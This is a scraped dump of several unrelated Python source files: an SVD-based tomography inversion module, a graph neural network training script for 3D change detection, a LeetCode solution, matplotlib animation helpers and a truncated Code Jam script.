residual norm: :math:`\\\\sqrt{\\\\eta} = ||L x_\\\\lambda||`\n\n Parameters\n ----------\n beta\n reguralization parameter\n\n Returns\n -------\n float\n regularization norm\n \"\"\"\n return sqrt(self.eta(beta))\n\n # ------------------------------------------------------\n # calculating the inverted solution using SVD components\n # ------------------------------------------------------\n\n def inverted_solution(self, beta: float) -> ndarray:\n \"\"\"Calculate the inverted solution using SVD components at given regularization parameter.\n\n The solution is calculated as follows:\n\n .. math::\n\n x_\\\\lambda\n =\n \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T}b\n =\n \\\\tilde{V}\n \\\\begin{pmatrix}\n w_1(\\\\lambda)\\\\frac{1}{\\\\sigma_1} & & \\\\\\\\\n & \\\\ddots & \\\\\\\\\n & & w_r(\\\\lambda)\\\\frac{1}{\\\\sigma_r}\n \\\\end{pmatrix}\n U^\\\\mathsf{T} b,\n\n where :math:`\\\\tilde{V} \\\\in \\\\mathbb{R}^{n\\\\times r}` is the inverted solution basis,\n which is defined by :obj:`.basis` as a property.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n vector_like (N, )\n solution vector\n \"\"\"\n return self._basis.dot((self.w(beta) / self._s) * self._ub)\n\n # ------------------------------------------------------\n # Optimization for the regularization parameter\n # ------------------------------------------------------\n @property\n def lambda_opt(self) -> float | None:\n \"\"\"Optimal regularization parameter defined after `.solve` is executed.\"\"\"\n return self._lambda_opt\n\n def solve(\n self,\n bounds: tuple[float, float] = (-20.0, 2.0),\n stepsize: float = 10,\n **kwargs,\n ) -> tuple[ndarray, dict]:\n \"\"\"Solve the ill-posed inversion equation.\n\n This method is used to seek the optimal regularization parameter finding the global minimum\n of an objective function using the :obj:`~scipy.optimize.basinhopping` function.\n\n An objective function `_objective_function` must be defined in the subclass.\n\n Parameters\n ----------\n bounds\n bounds of log10 of regularization parameter, by default (-20.0, 2.0).\n stepsize\n stepsize of optimization, by default 10.\n **kwargs\n keyword arguments for :obj:`~scipy.optimize.basinhopping` function.\n\n Returns\n -------\n tuple of :obj:`~numpy.ndarray` and :obj:`~scipy.optimize.OptimizeResult`\n (solution, res), where solution is the inverted solution vector\n and res is the result of optimization generated by :obj:`~scipy.optimize.basinhopping`.\n \"\"\"\n # initial guess of log10 of regularization parameter\n init_logbeta = 0.5 * (bounds[0] + bounds[1])\n\n # optimization\n res = basinhopping(\n self._objective_function,\n x0=10**init_logbeta,\n minimizer_kwargs={\"bounds\": [bounds]},\n stepsize=stepsize,\n **kwargs,\n )\n\n # set property of optimal lambda\n self._lambda_opt = 10 ** res.x[0]\n\n # optmized solution\n sol = self.inverted_solution(beta=self._lambda_opt)\n\n return sol, res\n\n def _objective_function(self, logbeta: float) -> floating | float:\n raise NotImplementedError(\"To be defined in subclass.\")\n\n\ndef compute_svd(\n gmat,\n hmat: sp_csc_matrix,\n use_gpu=False,\n sp: Spinner | DummySpinner | None = None,\n) -> tuple[ndarray, ndarray, ndarray]:\n \"\"\"Computes singular value decomposition (SVD) components of the geometry matrix :math:`T` and\n regularization matrix :math:`H`.\n\n Parameters\n ----------\n gmat : numpy.ndarray | scipy.sparse.spmatrix\n matrix for a linear equation which is called geometry matrix in tomography field\n spesifically, :math:`T\\\\in\\\\mathbb{R}^{m\\\\times n}`\n hmat : scipy.sparse.csc_matrix\n regularization matrix :math:`H \\\\in \\\\mathbb{R}^{n\\\\times n}`\n use_gpu : bool, optional\n whether to use GPU or not, by default False.\n If True, the :obj:`cupy` functionalities is used instead of numpy and scipy ones when\n calculating the inverse of :math:`L`, svd, inverted solution basis :math:`\\\\tilde{V}`, etc.\n Please ensure :obj:`cupy` is installed before using this option,\n otherwise an ModuleNotFoundError will be raised.\n sp : Spinner or DummySpinner, optional\n spinner object to show the progress of calculation, by default DummySpinner()\n\n Returns\n -------\n tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]\n singular values :math:`\\\\Sigma`, left singular vectors :math:`U` and inverted solution basis\n :math:`\\\\tilde{V}`\n\n Notes\n -----\n The ill-posed inversion equation can be solved by minimizing the following functional:\n\n .. math::\n\n \\\\Lambda(x) \\\\equiv \\\\|Tx - b\\\\|_2^2 + \\\\lambda O(x),\\\\label{eq:ill-posed}\\\\tag{1}\n\n where :math:`A` is a matrix in :math:`\\\\mathbb{R}^{m\\\\times n}`, :math:`x` is a solution vector\n in :math:`\\\\mathbb{R}^n` and :math:`b` is a given data vector in :math:`\\\\mathbb{R}^m`.\n :math:`O(x)` denotes the regularization functional, and :math:`\\\\lambda` is the regularization\n parameter balancing the data misfit and the regularization term.\n\n The regularization functional is typically a quadratic form :math:`O(x) = x^\\\\mathsf{T} H x`,\n with a symetric positive semi-definite matrix :math:`H \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n\n Hence, the minimum of :math:`\\\\Lambda(x)` is given by the solution of the following equation:\n\n .. math::\n\n x = (T^\\\\mathsf{T} T + \\\\lambda H)^{-1}T^\\\\mathsf{T} b.\\\\label{eq:ill-posed-solution}\\\\tag{2}\n\n A direct inversion of this equation is possible, however, it often needs a lot of computational\n resources. Additionaly, to comprehend the solution, the cholesky decomposition and the singular\n value decomposition (SVD) are often used [1]_.\n\n 1. Cholesky decomposition of :math:`H`\n\n .. math::\n\n PHP^\\\\mathsf{T} = LL^\\\\mathsf{T},\n\n where :math:`L` is a lower triangular matrix and :math:`P` is a fill-reducing permutation.\n\n 2. SVD of :math:`A\\\\equiv TP^\\\\mathsf{T}L^{-\\\\mathsf{T}}`\n\n Let us substitute the result of cholesky decomposition into :math:`\\\\ref{eq:ill-posed-solution}`:\n\n .. math::\n\n x &= \\\\left(T^\\\\mathsf{T} T + \\\\lambda H\\\\right)^{-1}T^\\\\mathsf{T} b \\\\\\\\\n &= \\\\left(\n T^\\\\mathsf{T} T + \\\\lambda P^\\\\mathsf{T} L L^\\\\mathsf{T} P\n \\\\right)^{-1} T^\\\\mathsf{T} b \\\\\\\\\n &= \\\\left[\n P^\\\\mathsf{T} L\n \\\\left(\n L^{-1}P T^\\\\mathsf{T}\\\\ TP^\\\\mathsf{T} L^{-\\\\mathsf{T}} + \\\\lambda I_n\n \\\\right)\n L^\\\\mathsf{T} P\n \\\\right]^{-1} T^\\\\mathsf{T} b \\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}}\\\\left(A^\\\\mathsf{T}A + \\\\lambda I_n\\\\right)^{-1}\n A^\\\\mathsf{T} b \\\\quad(\\\\because A\\\\equiv TP^\\\\mathsf{T}L^{-\\\\mathsf{T}})\\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}}\n \\\\left(\n V\\\\Sigma U^\\\\mathsf{T} U\\\\Sigma V^\\\\mathsf{T} + \\\\lambda I_n\n \\\\right)^{-1}\n V\\\\Sigma^\\\\mathsf{T} U^\\\\mathsf{T} b\n \\\\quad(\\\\because A = U\\\\Sigma V^\\\\mathsf{T}: \\\\text{SVD})\\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}} V^{-\\\\mathsf{T}}\n \\\\left(\\\\Sigma^2 + \\\\lambda I_r\\\\right)^{-1}\n V^{-1}V \\\\Sigma U^\\\\mathsf{T} b \\\\\\\\\n &= \\\\tilde{V}\n \\\\left(I_r + \\\\lambda \\\\Sigma^{-2}\\\\right)^{-1}\n \\\\Sigma^{-1} U^\\\\mathsf{T} b \\\\\\\\\n &= \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T} b,\n\n where :math:`U \\\\in \\\\mathbb{R}^{m\\\\times r}` and :math:`V \\\\in \\\\mathbb{R}^{n\\\\times r}`\n are the left and right singular vectors of :math:`A`, respectively,\n :math:`\\\\Sigma \\\\in \\\\mathbb{R}^{r\\\\times r}` is the diagonal matrix of singular values,\n :math:`r` is the rank of :math:`A` (:math:`r \\\\leq \\\\min(m, n)`),\n :math:`\\\\tilde{V} \\\\equiv P^\\\\mathsf{T}L^{-\\\\mathsf{T}}V \\\\in \\\\mathbb{R}^{n\\\\times r}` is\n the inverted solution basis,\n :math:`W \\\\equiv \\\\text{diag}(w_1, w_2, ..., w_r) \\\\in \\\\mathbb{R}^{r\\\\times r}`\n is the window function matrix and :math:`w_i` is the window function defined as follows:\n\n .. math::\n\n w_i \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma_i^2},\n\n where :math:`\\\\sigma_i` is the :math:`i`-th singular value of :math:`A`.\n\n As described above, the inverted solution :math:`x` can be finally calculated as follows:\n\n .. math::\n\n x = \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T} b. \\\\label{eq:inverted-solution}\\\\tag{3}\n\n This function computes and returns :math:`\\\\Sigma`, :math:`U` and :math:`\\\\tilde{V}`\n using the above procedure if :math:`T` and :math:`H` are given.\n\n References\n ----------\n .. [1] Odstrčil T, Pütterich T, Odstrčil M, Gude A, Igochine V, Stroth U; ASDEX Upgrade Team,\n *Optimized tomography methods for plasma emissivity reconstruction at the ASDEX Upgrade\n tokamak*, Rev. Sci. Instrum. **87**, 123505 (2016), :doi:`10.1063/1.4971367`\n\n Examples\n --------\n .. prompt:: python >>> auto\n\n >>> s, u, basis = compute_svd(gmat, hmat, use_gpu=True)\n \"\"\"\n # === Validation of input parameters ===========================================================\n # import modules\n if use_gpu:\n from cupy import asarray, eye, get_default_memory_pool, get_default_pinned_memory_pool, sqrt\n from cupy.linalg import svd\n from cupyx.scipy.sparse import csr_matrix, diags\n from cupyx.scipy.sparse.linalg import spsolve_triangular\n from scipy.sparse.linalg import eigsh # NOTE: cupy eigsh has a bug\n\n mempool = get_default_memory_pool()\n pinned_mempool = get_default_pinned_memory_pool()\n _cupy_available = True\n else:\n from numpy import asarray, eye, sqrt\n from scipy.linalg import svd\n from scipy.sparse import csr_matrix, diags\n from scipy.sparse.linalg import eigsh, spsolve_triangular\n\n _cupy_available = False\n\n # check if hmat is a sparse matrix\n if not isinstance(hmat, sp_csc_matrix):\n raise TypeError(\"hmat must be a scipy.sparse.csc_matrix.\")\n\n # check matrix dimension\n if hasattr(gmat, \"ndim\"):\n if gmat.ndim != 2 or hmat.ndim != 2:\n raise ValueError(\"gmat and hmat must be 2-dimensional arrays.\")\n else:\n raise AttributeError(\"gmat and hmat must have the attribute 'ndim'.\")\n\n # check matrix shape\n if hasattr(gmat, \"shape\"):\n if gmat.shape[1] != hmat.shape[0]:\n raise ValueError(\"the number of columns of gmat must be same as that of hmat\")\n if hmat.shape[0] != hmat.shape[1]:\n raise ValueError(\"hmat must be a square matrix.\")\n else:\n raise AttributeError(\"gmat and hmat must have the attribute 'shape'.\")\n\n # check spinner instance\n if sp is None:\n sp = DummySpinner()\n elif not isinstance(sp, (Spinner, DummySpinner)):\n raise TypeError(\"sp must be a Spinner or DummySpinner instance.\")\n\n _base_text = sp.text + \" \"\n _use_gpu_text = \" by GPU\" if _cupy_available else \"\"\n # ==============================================================================================\n\n # compute L and P^T using cholesekey decomposition\n sp.text = _base_text + \"(computing L and P^T using cholesekey decomposition)\"\n L_mat, Pt = _compute_L_Pt(hmat)\n\n # compute L^{-T} using triangular solver\n sp.text = _base_text + f\"(computing L^-T using triangular solver{_use_gpu_text})\"\n Lt_inv = spsolve_triangular(\n csr_matrix(L_mat), eye(L_mat.shape[0]), lower=True, overwrite_b=True\n ).T\n\n # convert to numpy array from cupy array\n if _cupy_available:\n Lt_inv = Lt_inv.get()\n\n # free GPU memory pools\n mempool.free_all_blocks()\n pinned_mempool.free_all_blocks()\n\n # compute Pt @ Lt^{-1}\n # This calculation is performed in CPU because the performance of cupy is worse than numpy or\n # scipy in this calculation.\n sp.text = _base_text + \"(computing Pt @ Lt^-1)\"\n Pt_Lt_inv: sp_csr_matrix = Pt @ sp_csr_matrix(Lt_inv)\n\n if issparse(gmat):\n # compute A = gmat @ Pt @ Lt^{-1}\n sp.text = _base_text + \"(computing A = gmat @ Pt @ L^-T)\"\n A_mat: sp_csr_matrix = gmat.tocsc() @ Pt_Lt_inv\n\n # compute AA^T\n sp.text = _base_text + \"(computing AA^T)\"\n At = A_mat.T\n AAt = A_mat @ At\n\n # compute eigenvalues and eigenvectors of AA^T\n sp.text = _base_text + f\"(computing eigenvalues and vectors of AA^T{_use_gpu_text})\"\n # NOTE: cupy eigsh has a bug (https://github.com/cupy/cupy/issues/6446) so\n # scipy.sparse.linalg.eigsh is used instead\n eigvals, u_vecs = eigsh(AAt, k=AAt.shape[0] - 1, which=\"LM\", return_eigenvectors=True)\n # eigvals, u_vecs = eigsh(\n # csr_matrix(AAt), k=AAt.shape[0] - 1, which=\"LM\", return_eigenvectors=True\n # )\n\n # compute singular values and left vectors\n sp.text = _base_text + f\"(computing singular values and left vectors{_use_gpu_text})\"\n singular, u_vecs = _compute_su(asarray(eigvals), asarray(u_vecs), sqrt)\n\n # compute right singular vectors\n sp.text = _base_text + f\"(computing right singular vectors{_use_gpu_text})\"\n v_mat = asarray(At.A) @ asarray(u_vecs) @ diags(1 / singular)\n\n # compute inverted solution basis\n sp.text = _base_text + f\"(computing inverted solution basis{_use_gpu_text})\"\n basis = asarray(Pt_Lt_inv.A) @ v_mat\n\n else:\n # if gmat is a dense matrix, use SVD solver\n # compute A = gmat @ Pt @ Lt^{-1}\n sp.text = _base_text + \"(computing A = gmat @ Pt @ L^-T)\"\n A_mat: ndarray = gmat @ Pt_Lt_inv.A\n\n # compute SVD components\n sp.text = _base_text + f\"(computing SVD components directory{_use_gpu_text})\"\n kwargs = dict(overwrite_a=True) if not _cupy_available else {}\n u_vecs, singular, vh = svd(asarray(A_mat), full_matrices=False, **kwargs)\n\n # compute inverted solution basis\n sp.text = _base_text + f\"(computing inverted solution basis{_use_gpu_text})\"\n basis = asarray(Pt_Lt_inv.A) @ asarray(vh.T)\n\n if _cupy_available:\n singular = singular.get()\n u_vecs = u_vecs.get()\n basis = basis.get()\n\n # free GPU memory pools\n mempool.free_all_blocks()\n pinned_mempool.free_all_blocks()\n\n # reset spinner text\n sp.text = _base_text\n\n return singular, u_vecs, basis\n\n\ndef _compute_L_Pt(hmat: sp_csc_matrix) -> tuple[sp_csr_matrix, sp_csr_matrix]:\n # cholesky decomposition of H\n factor = cholesky(hmat)\n L_mat = factor.L().tocsr()\n\n # compute the fill-reducing permutation matrix P\n P_vec = factor.P()\n rows = arange(P_vec.size)\n data = ones_like(rows)\n P_mat = sp_csc_matrix((data, (rows, P_vec)), dtype=float)\n\n return L_mat, P_mat.T\n\n\ndef _compute_su(eigvals, eigvecs, sqrt: Callable):\n # sort eigenvalues and eigenvectors in descending order\n decend_index = eigvals.argsort()[::-1]\n eigvals = eigvals[decend_index]\n eigvecs = eigvecs[:, decend_index]\n\n # calculate singular values and left vectors (w/o zero eigenvalues)\n singular = sqrt(eigvals[eigvals > 0])\n u_vecs = eigvecs[:, eigvals > 0]\n return singular, u_vecs\n","repo_name":"munechika-koyo/cherab_inversion","sub_path":"cherab/inversion/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":29571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32495142407","text":"import pickle\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv,global_mean_pool\nfrom torch.nn import Sequential as Seq, Linear as Lin, ReLU, BatchNorm1d as BN, Dropout\nfrom torch.nn import Conv1d,MaxPool1d\nimport random\n\n\nlabels = {'nochange': 0, 'added': 1, 'removed': 2, 'change': 3, 'color_change': 4}\n\n\ndef MLP(channels):\n return Seq(*[\n Seq(Lin(channels[i - 1], channels[i]), ReLU())\n for i in range(1, len(channels))\n ])\n\n\nclass Incep1(torch.nn.Module):\n def __init__(self,features):\n super().__init__()\n self.c1 = Conv1d(features,int(features/2), kernel_size=1)\n self.c2 = Conv1d(int(features/2),int(features / 2), kernel_size=1)\n self.c3 = Conv1d(int(features/2),features, kernel_size=1)\n self.bn1 = BN(int(features))\n self.bn2 = BN(int(features/2))\n def forward(self,x):\n x1 = self.c1(x)\n x1 = F.relu(x1)\n x1 = self.bn2(x1)\n x2 = self.c2(x1)\n x2 = F.relu(x2)\n x2 = self.bn2(x2)\n x3 = self.c2(x1)\n x3 = F.relu(x3)\n x3 = self.bn2(x3)\n x4 = MaxPool1d(kernel_size=1)(x1)\n x5 = self.c3(x4)\n x5 = F.relu(x5)\n x5 = self.bn1(x5)\n merged = torch.cat([x1, x2, x3, x5], dim=1)\n return merged\n\n\nclass Incep2(torch.nn.Module):\n def __init__(self,features):\n super().__init__()\n self.c1 = Conv1d(features,features,kernel_size=1)\n self.c2 = Conv1d(features,int(features/2), kernel_size=1)\n self.c3 = Conv1d(features,int(features/4), kernel_size=1)\n self.bn1 = BN(features)\n self.bn2= BN(int(features/2))\n self.bn3 = BN(int(features / 4))\n\n def forward(self,x):\n s1 = self.c1(x)\n s1 = F.relu(s1)\n s1 = self.bn1(s1)\n s1 = F.relu(s1)\n\n s2 = self.c2(x)\n s2 = F.relu(s2)\n s2 = self.bn2(s2)\n s2 = F.relu(s2)\n\n s3 = self.c3(x)\n s3 = F.relu(s3)\n s3 = self.bn3(s3)\n s3 = F.relu(s3)\n\n merged = torch.cat([s1,s2,s3],dim = 1)\n merged = F.relu(merged)\n return merged\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(33, 128)\n self.conv2 = GCNConv(128,64)\n self.conv3 = GCNConv(64,32)\n self.lin1 = MLP([280, 128])\n self.mlp = Seq(\n MLP([128, 64]), Dropout(0.5), MLP([64, 32]), Dropout(0.5),\n Lin(32, 6))\n\n self.lin2 = MLP([140, 128])\n self.mlp2 = Seq(\n MLP([128, 64]), Dropout(0.5), MLP([64, 32]), Dropout(0.5),\n Lin(32, 6))\n\n self.colconv = GCNConv(39, 128)\n self.finallin = Lin(12,5)\n self.i1 = Incep1(32)\n self.i2 = Incep2(80)\n\n\n def forward(self, data16, data20,datacol):\n x16, edge_index16, batch16 = data16.features, data16.edge_index, data16.batch\n x20, edge_index20, batch20 = data20.features, data20.edge_index, data20.batch\n xcol,edge_indexcol,batchcol = datacol.features, datacol.edge_index , datacol.batch\n x16 = self.conv1(x16, edge_index16)\n x16 = F.relu(x16)\n x16 = self.conv2(x16, edge_index16)\n x16 = F.relu(x16)\n x16 = self.conv3(x16, edge_index16)\n x16 = torch.transpose(x16,0,1)\n x16 = self.i1(x16.unsqueeze(0))\n x16 = self.i2(x16)\n x16 = torch.transpose(x16.squeeze(0),0,1)\n x16 = global_mean_pool(x16,batch16)\n\n x20 = self.conv1(x20, edge_index20)\n x20 = F.relu(x20)\n x20 = self.conv2(x20, edge_index20)\n x20 = F.relu(x20)\n x20 = self.conv3(x20, edge_index20)\n x20 = torch.transpose(x20, 0, 1)\n x20 = self.i1(x20.unsqueeze(0))\n x20 = self.i2(x20)\n x20 = torch.transpose(x20.squeeze(0), 0, 1)\n\n x20 = global_mean_pool(x20, batch20)\n\n xcol = self.colconv(xcol, edge_indexcol)\n xcol = F.relu(xcol)\n xcol = self.conv2(xcol, edge_indexcol)\n xcol = F.relu(xcol)\n xcol = self.conv3(xcol, edge_indexcol)\n xcol = torch.transpose(xcol, 0, 1)\n xcol = self.i1(xcol.unsqueeze(0))\n xcol = self.i2(xcol)\n xcol = torch.transpose(xcol.squeeze(0), 0, 1)\n\n xcol = global_mean_pool(xcol, batchcol)\n xcol = self.lin2(xcol)\n\n xcol = self.mlp2(xcol)\n\n x = torch.cat([x16, x20], dim=1)\n x = self.lin1(x)\n x = self.mlp(x)\n out =torch.cat([x,xcol],dim = 1)\n out = self.finallin(out)\n return F.log_softmax(out,dim =-1)\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = Net().to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n\n\ndef train(loader):\n model.train()\n correct = 0\n confmatrix = np.zeros((5, 5))\n predictions = []\n total_loss = 0\n for i in loader:\n if i[0].flag == 1 and i[1].flag == 1:\n if (labels[i[0].truelab[0]] == 0):\n correct += 1\n if (labels[i[0].truelab[0]] == 0):\n confmatrix[0][0] += 1\n correct += 1\n else:\n confmatrix[0][labels[i[0].truelab[0]]] += 1\n predictions.append(0)\n else:\n data16 = i[0].to(device)\n data20 = i[1].to(device)\n dc = i[2].to(device)\n optimizer.zero_grad()\n model.eval()\n out = model(data16,data20,dc)\n model.train()\n loss = F.nll_loss(out,data16.y)\n yval = labels[data16.truelab[0]]\n pred = out.max(dim=1)[1].cpu().detach().numpy()\n loss.backward()\n optimizer.step()\n total_loss += loss.item()\n correct +=out.max(dim=1)[1].eq(data16.y).sum().item()\n predictions.append(out.max(dim=1)[1].cpu().detach().numpy())\n confmatrix[pred[0]][yval] += 1\n return correct/len(loader),predictions,confmatrix\n\n\ndef test(loader):\n model.eval()\n confmatrix = np.zeros((5,5))\n correct = 0\n predictions = []\n for i in loader:\n if i[0].flag == 1 and i[1].flag == 1:\n if labels[i[0].truelab[0]] == 0:\n confmatrix[0][0] += 1\n correct += 1\n else:\n confmatrix[0][labels[i[0].truelab[0]]] += 1\n predictions.append(0)\n else:\n data16 = i[0].to(device)\n data20 = i[1].to(device)\n dc = i[2].to(device)\n with torch.no_grad():\n out = model(data16,data20,dc)\n yval = labels[data16.truelab[0]]\n pred = out.max(dim=1)[1].cpu().detach().numpy()\n correct += out.max(dim=1)[1].eq(data16.y).sum().item()\n predictions.append(pred)\n confmatrix[pred[0]][yval] +=1\n return correct/len(loader),predictions,confmatrix\n\n\ndef save_model(model):\n torch.save(model.state_dict(), \"/home/rada/sdp/data/model1.pth\")\n\n\ndef load_model(model):\n model.load_state_dict(torch.load(\"/home/rada/sdp/data/model1.pth\"))\n model.eval()\n\n\nif __name__ == '__main__':\n maxacc = 0\n with open(\"data/train.dat\", \"rb\") as fp:\n loader_train = pickle.load(fp)\n with open(\"data/validation.dat\", \"rb\") as fp2:\n loader_test = pickle.load(fp2)\n\n for epoch in range(0, 120):\n print(epoch)\n print(\"train:\",end =' ')\n trainacc, trainpreds,train_confusion_matrix = train(loader_train)\n random.shuffle(loader_train)\n print(trainacc)\n print(train_confusion_matrix)\n print(\"test\",end=' ')\n testacc, testpreds,test_confusion_matrix = test(loader_train)\n print(testacc)\n print(test_confusion_matrix)\n random.shuffle(loader_test)\n\n #if testacc > maxacc:\n #save_model(model)\n\n\n\n\n","repo_name":"darshanbangera/3D-Change-Detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26088487705","text":"import math\nclass Solution:\n def isUgly(self, n: int) -> bool:\n if n <= 0:\n return False\n if n == 1:\n return True\n if n % 2 == 0: return self.isUgly(n//2)\n elif n % 3 == 0: return self.isUgly(n//3)\n elif n % 5 == 0: return self.isUgly(n//5)\n else: return False\n return True\n # if n <= 0:\n # return False\n # primes = set()\n # num = n\n # while num % 2 == 0:\n # primes.add(2)\n # num = num/2\n # for i in range(3, int(math.sqrt(num))+1, 2):\n # while num % i== 0:\n # # print(i)\n # primes.add(i)\n # num = num / i\n # if num > 2:\n # primes.add(int(num))\n # if len(primes) > 3:\n # return False\n # else:\n # for p in primes:\n # if p not in [2,3,5]:\n # return False\n # return True","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0263-ugly-number/0263-ugly-number.py","file_name":"0263-ugly-number.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42545455852","text":"import quantities as pq\nimport pylgn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.animation as animation\n\n\nclass MidpointNormalize(colors.Normalize):\n \"\"\"\n https://matplotlib.org/gallery/userdemo/colormap_normalizations.html\n \"\"\"\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n colors.Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y))\n\n\ndef raster_plot(data, xlabel=\"Time\", ylabel=\"Neuron\",\n orientation='horizontal', lineoffsets=1, linelengths=0.5,\n linewidths=None, colors=None, linestyles=\"solid\"):\n\n \"\"\"\n Raster plot\n\n Parameters\n ----------\n data : list or ndarray\n list/array of spike trains for individual locations.\n Each row corresponds to a location.\n\n xlabel : str, optional\n\n ylabel : str, optional\n\n orientation : {'horizontal', 'vertical'}, optional\n\n lineoffsets : scalar or sequence of scalars, optional\n\n linelengths : scalar or sequence of scalars, optional\n\n linewidths : scalar, scalar sequence or None, optional\n\n colors : color, sequence of colors or None, optional\n\n linestyles : str or tuple or a sequence of such values, optional\n\n \"\"\"\n fig, ax = plt.subplots()\n ax.eventplot(np.array(data), colors=colors, lineoffsets=lineoffsets, linelengths=linelengths,\n orientation=orientation, linewidths=linewidths, linestyles=linestyles)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n plt.show()\n\n return fig, ax\n\n\ndef animate_cube(cube, title=None, dt=None,\n vmin=None, vmax=None, cmap=\"RdBu_r\",\n save_anim=False, filename=\"anim.mp4\", writer=\"ffmpeg\"):\n \"\"\"\n Animates 3d array\n\n Parameters\n ----------\n cube : quantity array/array_like\n input array (Nt x Nx x Ny)\n\n title : str, optional\n\n dt : quantity scalar, optional, default: None\n\n vmin : quantity scalar/float, optional, default: cube.min()\n\n vmin : quantity scalar/float, optional, default: cube.max()\n\n save_anim : bool, optional, default: False\n\n filename : str, optional, default: \"anim.mp4\"\n\n writer : str, optional, default: \"ffmpeg\"\n\n \"\"\"\n fig = plt.figure()\n vmin = vmin or cube.min()\n vmax = vmax or cube.max()\n plt.title(\"\") if title is None else plt.title(title)\n\n def init():\n im.set_data(cube[0, :, :])\n ttl.set_text(\"\")\n return im, ttl\n\n def animate(j):\n im.set_data(cube[j, :, :])\n ttl.set_text(\"Frame = \" + str(j)) if dt is None \\\n else ttl.set_text(\"Time = {} {}\".format(round(j*dt.magnitude, 2),\n dt.dimensionality))\n return im, ttl\n\n ttl = plt.suptitle(\"\")\n im = plt.imshow(cube[0, :, :], animated=True, vmin=vmin, vmax=vmax,\n origin=\"lower\", cmap=cmap,\n norm=MidpointNormalize(midpoint=0.))\n\n plt.tight_layout()\n plt.subplots_adjust(top=0.9)\n\n anim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=cube.shape[0], interval=50,\n repeat=True, repeat_delay=1000)\n\n plt.colorbar()\n if save_anim:\n anim.save(filename, writer=writer)\n plt.show()\n\n return anim\n\n\ndef animate_spike_activity(data, times, positions, title=None,\n marker=\"o\", marker_size=10, marker_color=\"C0\",\n save_anim=False, filename=\"anim.mp4\", writer=\"ffmpeg\"):\n\n \"\"\"\n Animates spike activity\n\n Parameters\n ----------\n data : array_like\n input array (Nx x Ny x N_spikes)\n\n times : quantity array\n\n positions : quantity array\n\n title : str, optional\n\n marker : MarkerStyle, optional, default: 'o'\n marker style\n\n marker_size : float, optional, default: 10\n marker size\n\n marker_color : color, sequence, or sequence of color, optional, default: 'C0'\n marker color\n\n save_anim : bool, optional, default: False\n\n filename : str, optional, default: \"anim.mp4\"\n\n writer : str, optional, default: \"ffmpeg\"\n\n \"\"\"\n fig, ax = plt.subplots(1)\n ax.set_xlabel(\"x (deg)\")\n ax.set_ylabel(\"y (deg)\")\n plt.title(\"\") if title is None else plt.title(title)\n\n Nx, Ny = data.shape\n cube = np.zeros([times.shape[0], Nx, Ny])\n\n x, y = np.meshgrid(positions, positions)\n dt = times[1] - times[0]\n\n for m in range(Nx):\n for n in range(Ny):\n ids = np.round(data[m, n][:] / dt).astype(int).magnitude\n for i in ids:\n cube[i, m, n] = marker_size\n\n def init():\n scat.set_sizes(cube[0, :, :].flatten())\n ttl.set_text(\"\")\n return scat, ttl\n\n def animate(j):\n scat.set_sizes(cube[j, :, :].flatten())\n ttl.set_text(\"Time = {} {}\".format(round(j*dt.magnitude, 2),\n dt.dimensionality))\n return scat, ttl\n\n ttl = plt.suptitle(\"\")\n scat = plt.scatter(x=x, y=y, s=cube[0, :, :],\n marker=marker, c=marker_color)\n\n anim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=cube.shape[0], interval=100,\n repeat=True, repeat_delay=1000)\n\n if save_anim:\n anim.save(filename, writer=writer)\n plt.show()\n\n return anim\n","repo_name":"miladh/pylgn","sub_path":"pylgn/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23558889841","text":"#f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/input2', 'r')\r\n# C:\\Users\\Avinash\\Desktop\\Google codejam 2017\\pycharmworks\\AA-small-practice.in\r\n# f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/A-large-practice.in', 'r')\r\nf = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/B-small-attempt0.in', 'r')\r\ndata = f.readlines()\r\nf.close()\r\nf = open('tidy2', 'w')\r\nt = data[0]\r\ny = 0\r\nfor i in data[1:]:\r\n y += 1\r\n number = int(i)\r\n stringnumber = str(number)\r\n string1 = \"\"\r\n for j in range(len(stringnumber) - 1):\r\n ten = int(stringnumber[j])\r\n if stringnumber[j] > stringnumber[j + 1]:\r\n string1 = str(ten - 1)\r\n for k in range(j, len(stringnumber) - 1):\r\n string1 += \"9\"\r\n stringnumber = stringnumber[:j] + string1\r\n\r\n if stringnumber[j] == stringnumber[j + 1]:\r\n 